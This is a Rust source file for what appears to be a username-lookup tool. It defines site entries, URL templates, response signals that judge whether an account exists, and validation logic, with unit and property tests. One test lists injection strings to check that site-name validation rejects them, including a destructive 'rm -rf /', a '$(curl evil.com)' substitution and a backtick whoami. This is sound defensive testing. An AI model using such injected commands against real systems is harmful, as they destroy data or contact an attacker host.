1use std::fmt;
24
25use serde::{Deserialize, Serialize};
26
27use crate::check::MatchKind;
28use crate::error::{Error, Result};
29use crate::username::Username;
30
31#[derive(Debug, Clone, Serialize, Deserialize)]
33pub struct Site {
34 pub name: String,
37 pub url: UrlTemplate,
39 #[serde(default, skip_serializing_if = "Vec::is_empty")]
45 pub signals: Vec<Signal>,
46 #[serde(default, skip_serializing_if = "Option::is_none")]
55 pub known_present: Option<KnownPresent>,
56 #[serde(default, skip_serializing_if = "Option::is_none")]
59 pub known_absent: Option<String>,
60 #[serde(default, skip_serializing_if = "Vec::is_empty")]
63 pub extract: Vec<Extractor>,
64 #[serde(default, skip_serializing_if = "Vec::is_empty")]
70 pub tags: Vec<String>,
71 #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
77 pub request_headers: std::collections::BTreeMap<String, String>,
78 #[serde(default, skip_serializing_if = "Option::is_none")]
92 pub regex_check: Option<String>,
93 #[serde(default, skip_serializing_if = "Option::is_none")]
107 pub engine: Option<String>,
108}
109
110#[derive(Debug, Clone, Default, Serialize, Deserialize)]
120#[non_exhaustive]
121pub struct Engine {
122 #[serde(default, skip_serializing_if = "Vec::is_empty")]
125 pub signals: Vec<Signal>,
126 #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
130 pub request_headers: std::collections::BTreeMap<String, String>,
131 #[serde(default, skip_serializing_if = "Option::is_none")]
134 pub regex_check: Option<String>,
135}
136
137impl Engine {
138 pub fn validate(&self, name: &str) -> Result<()> {
147 if name.trim().is_empty() {
148 return Err(Error::InvalidSite {
149 reason: "engine name is empty".into(),
150 });
151 }
152 for signal in &self.signals {
153 signal.validate().map_err(|reason| Error::InvalidSite {
154 reason: format!("engine {name:?}: {reason}"),
155 })?;
156 }
157 if let Some(pat) = &self.regex_check {
158 if let Err(err) = regex::Regex::new(pat) {
159 tracing::warn!(
160 engine = %name, pattern = %pat, error = %err,
161 "engine regex_check did not compile; gate disabled for inheriting sites",
162 );
163 }
164 }
165 Ok(())
166 }
167
168 pub fn merge_into(&self, site: &mut Site) {
174 if site.signals.is_empty() {
175 site.signals.clone_from(&self.signals);
176 }
177 for (k, v) in &self.request_headers {
178 site.request_headers
179 .entry(k.clone())
180 .or_insert_with(|| v.clone());
181 }
182 if site.regex_check.is_none() {
183 site.regex_check.clone_from(&self.regex_check);
184 }
185 }
186}
187
188#[derive(Debug, Clone, Serialize, Deserialize)]
196#[serde(untagged)]
197#[non_exhaustive]
198pub enum KnownPresent {
199 Single(String),
201 Multiple(Vec<String>),
204}
205
206impl KnownPresent {
207 pub fn as_slice(&self) -> &[String] {
211 match self {
212 Self::Single(s) => std::slice::from_ref(s),
213 Self::Multiple(v) => v.as_slice(),
214 }
215 }
216
217 pub fn primary(&self) -> Option<&str> {
221 self.as_slice().first().map(String::as_str)
222 }
223}
224
225impl From<&str> for KnownPresent {
226 fn from(s: &str) -> Self {
227 Self::Single(s.to_owned())
228 }
229}
230
231impl From<String> for KnownPresent {
232 fn from(s: String) -> Self {
233 Self::Single(s)
234 }
235}
236
/// Upper bound on a site name's length, compared against `String::len()`
/// (a byte count) in `Site::validate`.
const NAME_MAX_LEN: usize = 80;
242
/// Returns `true` when `name` uses only the conservative site-name alphabet.
///
/// Rules:
/// - the name must not be empty;
/// - the first character must be an ASCII letter, ASCII digit, or `_`;
/// - every later character must be one of those, a space, or one of
///   `.` `(` `)` `!` `/` `+` `-`.
fn is_safe_site_name(name: &str) -> bool {
    // `all` is vacuously true on an empty string, so emptiness is ruled out first.
    !name.is_empty()
        && name.char_indices().all(|(offset, ch)| {
            let is_word_char = ch.is_ascii_alphanumeric() || ch == '_';
            // Space and punctuation are only allowed after the first character.
            let is_inner_extra =
                offset != 0 && matches!(ch, ' ' | '.' | '(' | ')' | '!' | '/' | '+' | '-');
            is_word_char || is_inner_extra
        })
}
259
260#[derive(Debug, Clone, Serialize, Deserialize)]
262pub struct Extractor {
263 pub field: String,
265 pub selector: String,
267 #[serde(default, skip_serializing_if = "Option::is_none")]
270 pub attr: Option<String>,
271}
272
273impl Site {
274 pub fn url_for(&self, username: &Username) -> String {
276 self.url.substitute(username.as_str())
277 }
278
279 pub fn validate(&self) -> Result<()> {
282 if self.name.trim().is_empty() {
283 return Err(Error::InvalidSite {
284 reason: "site name is empty".into(),
285 });
286 }
287 if self.name.len() > NAME_MAX_LEN {
295 return Err(Error::InvalidSite {
296 reason: format!(
297 "site name longer than {NAME_MAX_LEN} chars: {:?}",
298 self.name
299 ),
300 });
301 }
302 if !is_safe_site_name(&self.name) {
303 return Err(Error::InvalidSite {
304 reason: format!(
305 "site name {:?} contains characters outside the allowed \
306 set (word chars, space, `.()!/+-`)",
307 self.name
308 ),
309 });
310 }
311 if self.signals.is_empty() {
312 return Err(Error::InvalidSite {
313 reason: format!("site {:?}: signals list is empty", self.name),
314 });
315 }
316 for signal in &self.signals {
317 signal.validate().map_err(|reason| Error::InvalidSite {
318 reason: format!("site {:?}: {reason}", self.name),
319 })?;
320 }
321 for extractor in &self.extract {
322 if extractor.field.trim().is_empty() {
323 return Err(Error::InvalidSite {
324 reason: format!("site {:?}: extractor has an empty field name", self.name),
325 });
326 }
327 if scraper::Selector::parse(&extractor.selector).is_err() {
328 return Err(Error::InvalidSite {
329 reason: format!(
330 "site {:?}: invalid CSS selector {:?} for field {:?}",
331 self.name, extractor.selector, extractor.field
332 ),
333 });
334 }
335 }
336 if let Some(pat) = &self.regex_check {
337 if let Err(err) = regex::Regex::new(pat) {
338 tracing::warn!(
347 site = %self.name, pattern = %pat, error = %err,
348 "regex_check did not compile; username-gate disabled for this site",
349 );
350 }
351 }
352 if let Some(kp) = &self.known_present {
353 if kp.as_slice().is_empty() {
354 return Err(Error::InvalidSite {
355 reason: format!("site {:?}: known_present is an empty list", self.name),
356 });
357 }
358 for name in kp.as_slice() {
359 if name.trim().is_empty() {
360 return Err(Error::InvalidSite {
361 reason: format!(
362 "site {:?}: known_present contains an empty username",
363 self.name
364 ),
365 });
366 }
367 }
368 }
369 for tag in &self.tags {
370 if tag.trim().is_empty() {
371 return Err(Error::InvalidSite {
372 reason: format!("site {:?}: tag is empty", self.name),
373 });
374 }
375 }
376 Ok(())
377 }
378}
379
/// A URL template string wrapped in a newtype.
///
/// The inner string is private; the type's own constructor and serde
/// deserialization are the intended ways to obtain a value.
#[derive(Clone, Debug, Eq, PartialEq)]
pub struct UrlTemplate(String);
386
/// Literal marker inside a URL template that is replaced by the username.
const PLACEHOLDER: &str = "{username}";
388
389impl UrlTemplate {
390 pub fn new(template: impl Into<String>) -> Result<Self> {
392 let t = template.into();
393 if !t.contains(PLACEHOLDER) {
394 return Err(Error::InvalidSite {
395 reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
396 });
397 }
398 if !(t.starts_with("http://") || t.starts_with("https://")) {
399 return Err(Error::InvalidSite {
400 reason: format!("url template must start with http(s)://: {t:?}"),
401 });
402 }
403 Ok(Self(t))
404 }
405
406 fn substitute(&self, username: &str) -> String {
407 self.0.replace(PLACEHOLDER, username)
408 }
409
410 pub fn as_str(&self) -> &str {
412 &self.0
413 }
414}
415
416impl fmt::Display for UrlTemplate {
417 fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
418 f.write_str(&self.0)
419 }
420}
421
422impl Serialize for UrlTemplate {
423 fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
424 self.0.serialize(s)
425 }
426}
427
428impl<'de> Deserialize<'de> for UrlTemplate {
429 fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
430 let raw = String::deserialize(d)?;
431 Self::new(raw).map_err(serde::de::Error::custom)
432 }
433}
434
435#[derive(Debug, Clone, Serialize, Deserialize)]
441#[serde(tag = "kind", rename_all = "snake_case")]
442#[non_exhaustive]
443pub enum Signal {
444 StatusFound {
446 codes: Vec<u16>,
448 },
449 StatusNotFound {
451 codes: Vec<u16>,
453 },
454 BodyPresent {
456 text: String,
458 },
459 BodyAbsent {
461 text: String,
464 },
465 RedirectAbsent {
468 fragment: String,
472 },
473}
474
/// Borrowed view of one HTTP response: exactly the inputs signals evaluate.
#[derive(Debug)]
pub(crate) struct Probe<'a> {
    /// Response status code.
    pub(crate) status: u16,
    /// Final URL of the response; `redirect_absent` signals match against it.
    pub(crate) final_url: &'a str,
    /// Response body text; body signals search it for substrings.
    pub(crate) body: &'a str,
}
487
/// The vote cast by one signal for one probe.
#[derive(Clone, Copy, Debug, Eq, PartialEq)]
pub(crate) enum SignalVerdict {
    /// The signal fired and indicates the account exists.
    Found,
    /// The signal fired and indicates the account does not exist.
    NotFound,
    /// The signal did not fire; it abstains.
    Ambiguous,
}
498
499impl Signal {
500 pub(crate) fn needs_body(&self) -> bool {
503 matches!(self, Self::BodyPresent { .. } | Self::BodyAbsent { .. })
504 }
505
506 pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
508 match self {
509 Self::StatusFound { codes } => {
510 if codes.contains(&probe.status) {
511 SignalVerdict::Found
512 } else {
513 SignalVerdict::Ambiguous
514 }
515 }
516 Self::StatusNotFound { codes } => {
517 if codes.contains(&probe.status) {
518 SignalVerdict::NotFound
519 } else {
520 SignalVerdict::Ambiguous
521 }
522 }
523 Self::BodyPresent { text } => {
524 if probe.body.contains(text.as_str()) {
525 SignalVerdict::Found
526 } else {
527 SignalVerdict::Ambiguous
528 }
529 }
530 Self::BodyAbsent { text } => {
531 if probe.body.contains(text.as_str()) {
532 SignalVerdict::NotFound
533 } else {
534 SignalVerdict::Ambiguous
535 }
536 }
537 Self::RedirectAbsent { fragment } => {
538 if probe.final_url.contains(fragment.as_str()) {
539 SignalVerdict::NotFound
540 } else {
541 SignalVerdict::Ambiguous
542 }
543 }
544 }
545 }
546
547 pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
551 match self {
552 Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
553 Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
554 Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
555 Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
556 Self::RedirectAbsent { fragment } => {
557 format!("final URL contains {fragment:?} (redirect_absent)")
558 }
559 }
560 }
561
562 fn validate(&self) -> std::result::Result<(), String> {
563 match self {
564 Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
565 if codes.is_empty() {
566 return Err("status signal codes list is empty".into());
567 }
568 }
569 Self::BodyPresent { text } | Self::BodyAbsent { text } => {
570 if text.is_empty() {
571 return Err("body signal text is empty".into());
572 }
573 }
574 Self::RedirectAbsent { fragment } => {
575 if fragment.is_empty() {
576 return Err("redirect signal fragment is empty".into());
577 }
578 }
579 }
580 Ok(())
581 }
582}
583
584pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
590where
591 I: IntoIterator<Item = SignalVerdict>,
592{
593 let mut found = false;
594 let mut not_found = false;
595 for v in verdicts {
596 match v {
597 SignalVerdict::Found => found = true,
598 SignalVerdict::NotFound => not_found = true,
599 SignalVerdict::Ambiguous => {}
600 }
601 }
602 if not_found {
603 MatchKind::NotFound
604 } else if found {
605 MatchKind::Found
606 } else {
607 MatchKind::Uncertain
608 }
609}
610
#[cfg(test)]
mod tests {
    use super::*;

    /// Builds a minimal site around `signals`; every optional field is left empty.
    fn site_with(signals: Vec<Signal>) -> Site {
        Site {
            name: "Example".into(),
            url: UrlTemplate::new("https://example.com/{username}").unwrap(),
            signals,
            known_present: None,
            known_absent: None,
            extract: Vec::new(),
            tags: Vec::new(),
            request_headers: std::collections::BTreeMap::new(),
            regex_check: None,
            engine: None,
        }
    }

    /// A site that passes validation as-is, for tests that tweak a single field.
    fn valid_site() -> Site {
        site_with(vec![Signal::StatusFound { codes: vec![200] }])
    }

    #[test]
    fn url_template_substitutes_placeholder() {
        let user = Username::new("alice").unwrap();
        let site = valid_site();
        assert_eq!(site.url_for(&user), "https://example.com/alice");
    }

    #[test]
    fn url_template_rejects_missing_placeholder() {
        assert!(UrlTemplate::new("https://example.com/users/").is_err());
    }

    #[test]
    fn url_template_rejects_bad_scheme() {
        assert!(UrlTemplate::new("ftp://example.com/{username}").is_err());
    }

    #[test]
    fn validate_requires_non_empty_signals() {
        let err = site_with(vec![]).validate().unwrap_err();
        assert!(err.to_string().contains("signals list is empty"));
    }

    #[test]
    fn validate_rejects_empty_status_codes() {
        let err = site_with(vec![Signal::StatusFound { codes: vec![] }])
            .validate()
            .unwrap_err();
        assert!(err.to_string().contains("status signal"));
    }

    #[test]
    fn validate_rejects_empty_body_text() {
        let err = site_with(vec![Signal::BodyAbsent {
            text: String::new(),
        }])
        .validate()
        .unwrap_err();
        assert!(err.to_string().contains("body signal"));
    }

    #[test]
    fn validate_rejects_empty_redirect_fragment() {
        let err = site_with(vec![Signal::RedirectAbsent {
            fragment: String::new(),
        }])
        .validate()
        .unwrap_err();
        assert!(err.to_string().contains("redirect signal"));
    }

    #[test]
    fn validate_rejects_shell_metacharacters_in_name() {
        for bad in [
            "Foo\"; rm -rf /; #",
            "Bar$(curl evil.com)",
            "Baz`whoami`",
            // Literal backslash followed by `n` (NOT a newline).
            "Qux\\nfoo",
            "back\\slash",
            "pipe|ish",
            "semi;colon",
            "amp&and",
            "lt<gt>",
            // Raw control characters: a real newline, a tab, and a NUL byte.
            "new\nline",
            "tab\tbed",
            "nul\0byte",
        ] {
            let mut s = valid_site();
            s.name = bad.into();
            let err = s.validate().unwrap_err();
            assert!(
                err.to_string()
                    .contains("characters outside the allowed set"),
                "expected unsafe-name rejection for {bad:?}, got {err}",
            );
        }
    }

    #[test]
    fn validate_rejects_leading_punctuation_in_name() {
        // Punctuation and spaces are legal inside a name but not as its first character.
        for bad in [".hidden", "-dash", "(paren)", " padded"] {
            let mut s = valid_site();
            s.name = bad.into();
            let err = s.validate().unwrap_err();
            assert!(
                err.to_string()
                    .contains("characters outside the allowed set"),
                "expected leading-character rejection for {bad:?}, got {err}",
            );
        }
    }

    #[test]
    fn validate_accepts_real_world_site_names() {
        for ok in [
            "GitHub",
            "Steam Community (User)",
            "X / Twitter",
            "osu!",
            "Eintracht Frankfurt Forum",
            "Archive of Our Own",
            "Career.habr",
            "fl",
            "GitLab.com",
            "Sbazar.cz",
        ] {
            let mut s = valid_site();
            s.name = ok.into();
            assert!(s.validate().is_ok(), "expected {ok:?} to validate");
        }
    }

    #[test]
    fn validate_rejects_overlong_name() {
        let mut s = valid_site();
        s.name = "A".repeat(100);
        let err = s.validate().unwrap_err();
        assert!(err.to_string().contains("longer than"));
    }

    #[test]
    fn validate_name_length_limit_is_inclusive() {
        let mut s = valid_site();
        // Exactly at the limit: accepted.
        s.name = "A".repeat(NAME_MAX_LEN);
        assert!(s.validate().is_ok());
        // One past the limit: rejected.
        s.name.push('A');
        let err = s.validate().unwrap_err();
        assert!(err.to_string().contains("longer than"));
    }

    #[test]
    fn validate_accepts_well_formed_regex_check() {
        let mut s = valid_site();
        s.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
        assert!(s.validate().is_ok());
    }

    #[test]
    fn validate_tolerates_unsupported_regex_features() {
        let mut s = valid_site();
        // Look-around is not supported by the `regex` crate, so this fails to compile.
        s.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
        assert!(
            s.validate().is_ok(),
            "lookaround-bearing regex should warn, not reject the site"
        );
    }

    #[test]
    fn validate_rejects_empty_known_present_list() {
        let mut s = valid_site();
        s.known_present = Some(KnownPresent::Multiple(Vec::new()));
        let err = s.validate().unwrap_err();
        assert!(err.to_string().contains("known_present is an empty list"));
    }

    #[test]
    fn known_present_exposes_both_shapes_as_slice() {
        let single = KnownPresent::from("alice");
        assert_eq!(single.as_slice().len(), 1);
        assert_eq!(single.primary(), Some("alice"));

        let many = KnownPresent::Multiple(vec!["bob".into(), "carol".into()]);
        assert_eq!(many.as_slice().len(), 2);
        assert_eq!(many.primary(), Some("bob"));

        let none = KnownPresent::Multiple(Vec::new());
        assert!(none.as_slice().is_empty());
        assert_eq!(none.primary(), None);
    }

    #[test]
    fn engine_merge_fills_gaps_but_keeps_site_overrides() {
        let mut engine_headers = std::collections::BTreeMap::new();
        engine_headers.insert("Accept".to_owned(), "text/html".to_owned());
        engine_headers.insert("X-Engine".to_owned(), "1".to_owned());
        let engine = Engine {
            signals: vec![Signal::StatusNotFound { codes: vec![404] }],
            request_headers: engine_headers,
            regex_check: Some("^[a-z]+$".into()),
        };

        // A site with gaps inherits signals, missing headers, and the regex.
        let mut bare = site_with(vec![]);
        bare.request_headers
            .insert("Accept".into(), "application/json".into());
        engine.merge_into(&mut bare);
        assert!(matches!(
            bare.signals.as_slice(),
            [Signal::StatusNotFound { .. }]
        ));
        assert_eq!(bare.request_headers["Accept"], "application/json");
        assert_eq!(bare.request_headers["X-Engine"], "1");
        assert_eq!(bare.regex_check.as_deref(), Some("^[a-z]+$"));

        // A site with its own signals and regex keeps them.
        let mut full = valid_site();
        full.regex_check = Some("^x$".into());
        engine.merge_into(&mut full);
        assert!(matches!(
            full.signals.as_slice(),
            [Signal::StatusFound { .. }]
        ));
        assert_eq!(full.regex_check.as_deref(), Some("^x$"));
    }

    #[test]
    fn signal_status_found_votes_only_on_match() {
        let signal = Signal::StatusFound { codes: vec![200] };
        let probe = Probe {
            status: 200,
            final_url: "https://example.com/alice",
            body: "",
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
        let probe = Probe {
            status: 404,
            ..probe
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
    }

    #[test]
    fn signal_status_not_found_votes_only_on_match() {
        let signal = Signal::StatusNotFound { codes: vec![404] };
        let probe = Probe {
            status: 404,
            final_url: "",
            body: "",
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
        let probe = Probe {
            status: 200,
            ..probe
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
    }

    #[test]
    fn signal_body_absent_votes_not_found_when_text_present() {
        let signal = Signal::BodyAbsent {
            text: "Profile not found".into(),
        };
        let probe = Probe {
            status: 200,
            final_url: "",
            body: "<h1>Profile not found</h1>",
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
        let probe = Probe {
            body: "<h1>Welcome alice</h1>",
            ..probe
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
    }

    #[test]
    fn signal_redirect_absent_inspects_final_url() {
        let signal = Signal::RedirectAbsent {
            fragment: "/login".into(),
        };
        let probe = Probe {
            status: 200,
            final_url: "https://example.com/login?next=/alice",
            body: "",
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
        let probe = Probe {
            final_url: "https://example.com/alice",
            ..probe
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
    }

    #[test]
    fn aggregate_found_when_only_found_signals_fire() {
        let kind = aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]);
        assert_eq!(kind, MatchKind::Found);
    }

    #[test]
    fn aggregate_not_found_when_only_not_found_signals_fire() {
        let kind = aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]);
        assert_eq!(kind, MatchKind::NotFound);
    }

    #[test]
    fn aggregate_not_found_wins_over_found() {
        let kind = aggregate([SignalVerdict::Found, SignalVerdict::NotFound]);
        assert_eq!(kind, MatchKind::NotFound);
    }

    #[test]
    fn aggregate_uncertain_when_no_signals_fire() {
        let kind = aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]);
        assert_eq!(kind, MatchKind::Uncertain);
    }

    #[test]
    fn aggregate_empty_is_uncertain() {
        let kind = aggregate(std::iter::empty());
        assert_eq!(kind, MatchKind::Uncertain);
    }

    #[test]
    fn needs_body_is_true_only_for_body_signals() {
        assert!(!Signal::StatusFound { codes: vec![200] }.needs_body());
        assert!(!Signal::StatusNotFound { codes: vec![404] }.needs_body());
        assert!(
            !Signal::RedirectAbsent {
                fragment: "/login".into()
            }
            .needs_body()
        );
        assert!(Signal::BodyPresent { text: "x".into() }.needs_body());
        assert!(Signal::BodyAbsent { text: "x".into() }.needs_body());
    }

    #[test]
    fn deserializes_signal_list() {
        let json = r#"{
            "name": "GitHub",
            "url": "https://github.com/{username}",
            "signals": [
                { "kind": "status_found", "codes": [200] },
                { "kind": "status_not_found", "codes": [404] }
            ]
        }"#;
        let site: Site = serde_json::from_str(json).unwrap();
        assert_eq!(site.name, "GitHub");
        assert_eq!(site.signals.len(), 2);
        site.validate().unwrap();
    }

    proptest::proptest! {
        // For any mix of votes: NotFound beats Found, Found beats abstention.
        #[test]
        fn aggregate_matches_negative_priority_spec(
            votes in proptest::collection::vec(
                proptest::prop_oneof![
                    proptest::strategy::Just(SignalVerdict::Found),
                    proptest::strategy::Just(SignalVerdict::NotFound),
                    proptest::strategy::Just(SignalVerdict::Ambiguous),
                ],
                0..16,
            ),
        ) {
            let kind = aggregate(votes.iter().copied());
            let expected = if votes.contains(&SignalVerdict::NotFound) {
                MatchKind::NotFound
            } else if votes.contains(&SignalVerdict::Found) {
                MatchKind::Found
            } else {
                MatchKind::Uncertain
            };
            proptest::prop_assert_eq!(kind, expected);
        }
    }
}